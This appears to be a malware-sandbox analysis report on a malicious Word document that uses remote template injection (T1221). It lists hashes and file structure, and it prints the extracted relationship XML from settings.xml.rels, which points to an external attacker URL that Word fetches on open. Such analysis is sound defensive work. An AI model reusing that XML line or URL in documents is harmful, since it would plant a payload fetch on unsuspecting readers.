Malicious
Malicious

acaa49995bfa857288f0e2c72e7a1594

MS Word Document
|
MD5: acaa49995bfa857288f0e2c72e7a1594
|
Size: 186.58 KB
|
application/msword

Office Document
Remote Template Injection
T1221
Moderately Suspicious Document
Print
General
Structural Analysis
Config.1
Yara Rules11
Sync
Community
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
acaa49995bfa857288f0e2c72e7a1594
Sha1
20ce211770246a879c9c9916c914095668b7a599
Sha256
10a73a0af103860ea72efa4daf143e4073445a0b64c80a81164caef4cb78aaa8
Sha384
6552ad68a15cbd58a74f3cc2342615b4e3f4f56e1a6a8bd8a8ab630c749bb2f801f0ed68427d3628f2fec30fed1be813
Sha512
930f98199b738b56bf16b63627575ecfd6829e28274593a2a879e7dce64cc7a871877a2f8f3965f928f9dcb52744b9c6f81d1b27e22fbd1dc0894935c699948d
SSDeep
3072:TLMc1jjgF2qCO0KSSXpjjgF2qCO0KSSXtRVvNeb5wgv0H8M/VYlZ8:lxjgYO0lQjgYO0lkO9wBB/mT8
TLSH
C3041220ACEC055DC1491EFDA66DB61C6CB867529F2754B0E82BB738CB2E9CF950114F
File Structure
acaa49995bfa857288f0e2c72e7a1594
Office Document
Remote Template Injection
T1221
Moderately Suspicious Document
Malicious
[Content_Types].xml
Xml
_rels
.rels
Xml
word
Malicious
_rels
Malicious
document.xml.rels
Xml
header2.xml.rels
Xml
settings.xml.rels
Xml
Remote Template Injection
T1221
Moderately Suspicious Document
Malicious
document.xml
Xml
footnotes.xml
Xml
footer3.xml
Xml
header3.xml
Xml
endnotes.xml
Xml
header2.xml
Xml
embeddings
oleObject2.bin
Office Document
Root Entry
Ole
CompObj
ObjInfo
CONTENTS
Text (Preview)
Page #1
PDF Text Preview (generated)
#Stream {27}
#Stream {7}
#Stream {5}
#Stream {8}
#Stream {11}
#Stream {12}
Structure
theme
theme1.xml
Xml
media
image1.emf
settings.xml
Xml
fontTable.xml
Xml
styles.xml
Xml
webSettings.xml
Xml
docProps
app.xml
Xml
core.xml
Xml
Malware Configuration - Remote Template
Config. Field
 Value
Target

https://greenthingstoworkonbestthingswithbetterguywhogivingbestthignsforuknow.dOTX@ct.rocks/v4RkCG
Path

settings.xml.rels
XPath

/Relationships/Relationship
Outer XML

<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="https://greenthingstoworkonbestthingswithbetterguywhogivingbestthignsforuknow.dOTX@ct.rocks/v4RkCG" TargetMode="External" xmlns="http://schemas.openxmlformats.org/package/2006/relationships" />
Informations
Name
 Value
CONTENTS

1.6
CONTENTS

D:20241003125036+04'00'
CONTENTS

D:20241003125036+04'00'
CONTENTS

Oracle XML Publisher 5.6.3
CONTENTS

D:20241003125036+04'00'
CONTENTS

D:20241003125036+04'00'
CONTENTS

Oracle XML Publisher 5.6.3
Artefacts
Name
 Value
Remote Template - Highly Suspicious

https://greenthingstoworkonbestthingswithbetterguywhogivingbestthignsforuknow.dOTX@ct.rocks/v4RkCG
acaa49995bfa857288f0e2c72e7a1594 (186.58 KB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙